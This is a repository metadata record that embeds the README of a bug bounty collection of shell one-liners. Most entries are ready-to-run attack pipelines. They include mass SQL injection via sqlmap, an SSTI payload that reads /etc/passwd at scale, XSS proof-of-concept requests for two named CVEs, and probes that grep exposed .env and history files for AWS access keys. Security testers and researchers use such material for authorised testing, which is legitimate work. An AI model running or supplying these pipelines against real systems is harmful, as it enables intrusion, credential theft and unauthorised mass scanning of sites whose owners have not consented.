{"id":19661988,"url":"https://github.com/daffainfo/oneliner-bugbounty","last_synced_at":"2026-02-14T23:02:18.881Z","repository":{"id":37304217,"uuid":"345822742","full_name":"daffainfo/Oneliner-Bugbounty","owner":"daffainfo","description":"A collection  oneliner scripts for bug bounty","archived":false,"fork":false,"pushed_at":"2024-03-21T08:44:04.000Z","size":9,"stargazers_count":179,"open_issues_count":2,"forks_count":41,"subscribers_count":6,"default_branch":"main","last_synced_at":"2025-07-21T00:42:30.179Z","etag":null,"topics":["bugbounty","hacktoberfest","pentest"],"latest_commit_sha":null,"homepage":"","language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/daffainfo.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2021-03-08T23:20:53.000Z","updated_at":"2025-07-03T11:50:31.000Z","dependencies_parsed_at":"2024-11-28T02:32:47.061Z","dependency_job_id":"3d7af81f-2408-4ea3-a3b0-d09045a471de","html_url":"https://github.com/daffainfo/Oneliner-Bugbounty","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/daffainfo/Oneliner-Bugbounty","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/daffainfo%2FOneliner-Bugbounty","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/daffainfo%2FOneliner-Bugbounty/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/daffainfo%2FOneliner-Bugbounty/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/daffainfo%2FOneliner-Bugbounty/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/daffainfo","download_url":"https://codeload.github.com/daffainfo/Oneliner-Bugbounty/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/daffainfo%2FOneliner-Bugbounty/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":278283455,"owners_count":25961311,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-10-04T02:00:05.491Z","response_time":63,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["bugbounty","hacktoberfest","pentest"],"created_at":"2024-11-11T16:09:13.743Z","updated_at":"2025-10-04T07:54:03.086Z","avatar_url":"https://github.com/daffainfo.png","language":null,"funding_links":[],"categories":[],"sub_categories":[],"readme":"# Oneliner-Bugbounty\nA collection oneliner scripts for bug bounty\n\n## List tools\n- [Subfinder](https://github.com/projectdiscovery/subfinder)\n- [Naabu](https://github.com/projectdiscovery/naabu)\n- [httpx](https://github.com/projectdiscovery/httpx)\n- [Nuclei](https://github.com/projectdiscovery/nuclei)\n- [Waybackurls](https://github.com/tomnomnom/waybackurls)\n- [DNSProbe](https://github.com/projectdiscovery/dnsprobe)\n- [gf](https://github.com/tomnomnom/gf)\n- [sqlmap](https://github.com/sqlmapproject/sqlmap)\n- [qsreplace](https://github.com/tomnomnom/qsreplace)\n- [hakrawler](https://github.com/hakluke/hakrawler)\n- [Puredns](https://github.com/d3mondev/puredns)\n- [GauPlus](https://github.com/bp0lr/gauplus)\n- [uro](https://github.com/s0md3v/uro)\n\n### Auto scanner\n\n```bash\nsubfinder -d site.com -all | naabu | httpx | nuclei -t nuclei-templates\n```\n\n### Finding files (For example in here .json file)\n\n```bash\nsubfinder -d site.com -all | naabu | httpx | waybackurls | grep -E \".json(?:onp?)?$\"\n```\n\n### Find interesting subdomain (For example like admin.staging.example.com) \n\n```bash\nsubfinder -d site.com -all | dnsprobe -silent | cut -d ' ' -f1 | grep --color 'dmz\\|api\\|staging\\|env\\|v1\\|stag\\|prod\\|dev\\|stg\\|test\\|demo\\|pre\\|admin\\|beta\\|vpn\\|cdn\\|coll\\|sandbox\\|qa\\|intra\\|extra\\|s3\\|external\\|back'\n```\n\n### Find SQL injection at scale\n\n```bash\nsubfinder -d site.com -all -silent | waybackurls | sort -u | gf sqli \u003e gf_sqli.txt; sqlmap -m gf_sqli.txt --batch --risk 3 --random-agent | tee -a sqli.txt\n```\n\n### Find open redirects at scale\n\n```bash\nsubfinder -d site.com -all -silent | waybackurls | sort -u | gf redirect | qsreplace 'https://example.com' | httpx -fr -title --match-string 'Example Domain'\n```\n\n### Find SSTI at scale\n\n```bash\necho \"domain\" | subfinder -silent | waybackurls | gf ssti | qsreplace \"{{''.class.mro[2].subclasses()[40]('/etc/passwd').read()}}\" | parallel -j50 -q curl -g | grep  \"root:x\"\n```\n\n### Scanning top exploited vulnerabilities according to CISA\n\n```bash\nsubfinder -d site.com -all -silent | httpx -silent | nuclei -rl 50 -c 15 -timeout 10 -tags cisa -vv\n```\n\n### Bruteforce subdomains\n\n```bash\nsubfinder -d site.com -all -silent | httpx -silent | hakrawler | tr \"[:punct:]\" \"\\n\" | sort -u \u003e wordlist.txt\n\npuredns bruteforce wordlist.txt site.com -r resolvers.txt -w output.txt\n```\n\n### Finding Cross-Site Scripting (XSS) using KnoXSS API\n\n```bash\necho \"domain\" | subfinder -silent | gauplus | grep \"=\" | uro | gf xss | awk '{ print \"curl https://knoxss[.]me/api/v3 -d \\\"target=\"$1 \"\\\" -H \\\"X-API-KEY: APIKNOXSS\\\"\"}' | sh\n```\n\n### CVE-2021-31589\n\n```bash\ncat subs.txt | while read host do; do curl -sk \"$host/appliance/login.ns?login%5Bpassword%5D=test%22%3E%3Csvg/onload=alert(document.domain)%3E\u0026login%5Buse_curr%5D=1\u0026login%5Bsubmit%5D=Change%20Password\" | grep -qs '\"\u003e\u003csvg/onload=alert(document.domain)\u003e' \u0026\u0026 echo \"$host: Vuln\" || echo \"$host: Not Vuln\"; done\n```\n\n### CVE-2023-29489\n\n```bash\nsubfinder -d target.com -silent -all | httpx -silent -ports http:80,https:443,2082,2083 -path 'cpanelwebcall/\u003cimg%20src=x%20onerror=\"prompt(document.domain)\"\u003eaaaaaaaaaa' -mc 400\n``` \n\n### Clean list of host, port, and version\n\n```bash\nmkdir nmap; cat targets.txt | parallel -j 35 nmap {} -sTVC -host-timeout 15m -oN nmap/{} -p 22,80,443,8080 --open \u003e /dev/null 2\u003e\u00261; cd nmap; grep -Hari \"/tcp\" | tee -a ../services.txt; cd ../\n```\n\n### Waybackurls validator\n\n```bash\nwaybackurls http://example.com | grep \"url\" | xargs -n 1 curl -s -o /dev/null -w \"%{http_code} \u003e %{url_effective}\\n\" | sort\n```\n\n### Extract endpoints from JS (Part 1)\n\n```bash\ncurl -L -k -s https://www.example.com | tac | sed \"s#\\\\\\/#\\/#g\" | egrep -o \"src['\\\"]?\\s*[=:]\\s*['\\\"]?[^'\\\"]+.js[^'\\\"\u003e ]*\" | awk -F '//' '{if(length($2))print \"https://\"$2}' | sort -fu | xargs -I '%' sh -c \"curl -k -s \\\"%\\\" | sed \\\"s/[;}\\)\u003e]/\\n/g\\\" | grep -Po \\\"(['\\\\\\\"](https?:)?[/]{1,2}[^'\\\\\\\"\u003e ]{5,})|(\\.(get|post|ajax|load)\\s*\\(\\s*['\\\\\\\"](https?:)?[/]{1,2}[^'\\\\\\\"\u003e ]{5,})\\\"\" | awk -F \"['\\\"]\" '{print $2}' | sort -fu\n```\n\n### Extract endpoints from JS (Part 2)\n\n```bash\ncurl -Lks https://example.com | tac | sed \"s#\\\\\\/#\\/#g\" | egrep -o \"src['\\\"]?\\s*[=:]\\s*['\\\"]?[^'\\\"]+.js[^'\\\"\u003e ]*\" | sed -r \"s/^src['\\\"]?[=:]['\\\"]//g\" | awk -v url=https://example.com '{if(length($1)) if($1 ~/^http/) print $1; else if($1 ~/^\\/\\//) print \"https:\"$1; else print url\"/\"$1}' | sort -fu | xargs -I '%' sh -c \"echo \\\"\\n##### %\\\";wget --no-check-certificate --quiet \\\"%\\\"; basename \\\"%\\\" | xargs -I \\\"#\\\" sh -c 'linkfinder.py -o cli -i #'\"\n```\n\n### Extract endpoints from JS (Part 3)\n\n```bash\ncurl -Lks https://example.com | tac | sed \"s#\\\\\\/#\\/#g\" | egrep -o \"src['\\\"]?\\s*[=:]\\s*['\\\"]?[^'\\\"]+.js[^'\\\"\u003e ]*\" | sed -r \"s/^src['\\\"]?[=:]['\\\"]//g\" | awk -v url=https://example.com '{if(length($1)) if($1 ~/^http/) print $1; else if($1 ~/^\\/\\//) print \"https:\"$1; else print url\"/\"$1}' | sort -fu | xargs -I '%' sh -c \"echo \\\"\\n##### %\\\";wget --no-check-certificate --quiet \\\"%\\\";curl -Lks \\\"%\\\" | sed \\\"s/[;}\\)\u003e]/\\n/g\\\" | grep -Po \\\"('#####.*)|(['\\\\\\\"](https?:)?[/]{1,2}[^'\\\\\\\"\u003e ]{5,})|(\\.(get|post|ajax|load)\\s*\\(\\s*['\\\\\\\"](https?:)?[/]{1,2}[^'\\\\\\\"\u003e ]{5,})\\\" | sort -fu\" | tr -d \"'\\\"\"\n```\n\n### Extract endpoints from JS (Part 4)\n\n```bash\ncurl -Lks https://example.com | tac | sed \"s#\\\\\\/#\\/#g\" | egrep -o \"src['\\\"]?\\s*[=:]\\s*['\\\"]?[^'\\\"]+.js[^'\\\"\u003e ]*\" | sed -r \"s/^src['\\\"]?[=:]['\\\"]//g\" | awk -v url=https://example.com '{if(length($1)) if($1 ~/^http/) print $1; else if($1 ~/^\\/\\//) print \"https:\"$1; else print url\"/\"$1}' | sort -fu | xargs -I '%' sh -c \"echo \\\"'##### %\\\";curl -k -s \\\"%\\\" | sed \\\"s/[;}\\)\u003e]/\\n/g\\\" | grep -Po \\\"('#####.*)|(['\\\\\\\"](https?:)?[/]{1,2}[^'\\\\\\\"\u003e ]{5,})|(\\.(get|post|ajax|load)\\s*\\(\\s*['\\\\\\\"](https?:)?[/]{1,2}[^'\\\\\\\"\u003e ]{5,})\\\" | sort -fu\" | tr -d \"'\\\"\"\n```\n\n### Find Access Keys for IAM\n\n```bash\necho example.com | subfinder -silent -all | httpx -silent -path \".env\",\".mysql_history\",\"echo $(echo $(\u003c/dev/stdin) | cut -d \".\" -f2).sql\" -mc 200 -ports 80,443,8080,8443 | grep -E -i \"AKIA[A-Z0-9]{16}\"\n```\n\n### Subdomain enumeration with Spyse API\n\n```bash\ncurl -XGET \"https://api.sypse.com/v3/data/domain/subdomain?limit=100\u0026offset=100\u0026domain=example.com\" -H \"Accept: application/json\" -H \"Authorization: Bearer TOKEN_HERE\" 2\u003e/dev/null | jq '.data.items | .[] | .name' | sed -e 's/^\"//' -e 's/\"$//' | grep example.com\n```\n\n## References\n- [ReconOne](https://twitter.com/ReconOne_)\n- [jdksec](https://twitter.com/jdksec/status/1236891532256575488)\n- [atikqur007](https://twitter.com/atikqur007/status/1253235713023320064)\n- [ofjaaah](https://twitter.com/ofjaaah/status/1532581839344394241)\n- [pikpikcu](https://twitter.com/sec715/status/1295216521501908992)\n- [gwen001](https://gist.github.com/gwen001/0b15714d964d99c740a7e8998bd483df)\n- [sazekodzeb](https://twitter.com/sazekodzeb/status/1535967868390711302)\n- [TheDarkSideOps](https://twitter.com/TheDarkSideOps/status/1310744404605501441)\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fdaffainfo%2Foneliner-bugbounty","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fdaffainfo%2Foneliner-bugbounty","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fdaffainfo%2Foneliner-bugbounty/lists"}